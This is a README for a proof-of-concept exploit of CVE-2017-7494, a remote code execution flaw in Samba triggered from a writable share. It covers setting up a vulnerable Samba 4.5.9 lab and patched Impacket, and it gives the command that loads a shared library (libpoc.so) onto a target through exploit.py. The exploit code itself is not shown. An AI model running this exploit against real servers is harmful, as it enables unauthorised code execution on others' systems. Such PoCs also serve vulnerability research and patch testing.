/cve-2017-7494

Proof-of-Concept exploit for CVE-2017-7494(Samba RCE from a writable share)

Primary LanguagePython

Basic Setup

Install Samba version 4.5.9

https://download.samba.org/pub/samba/stable/samba-4.5.9.tar.gz https://wiki.samba.org/index.php/Build_Samba_from_Source

Get patched version of Impacket

pip install -r requirements.txt

Usage

  1. Start Samba server in interactive mode + debug print

sudo /home/ubuntu/samba-4.5.9/bin/smbd -i --debuglevel=10 --configfile=/etc/samba/smb.conf

  1. Copy libpoc.so to target share
  2. HAVE FUN!

exploit.py -t x.x.x.x -m /path/to/libpoc.so

Screenshot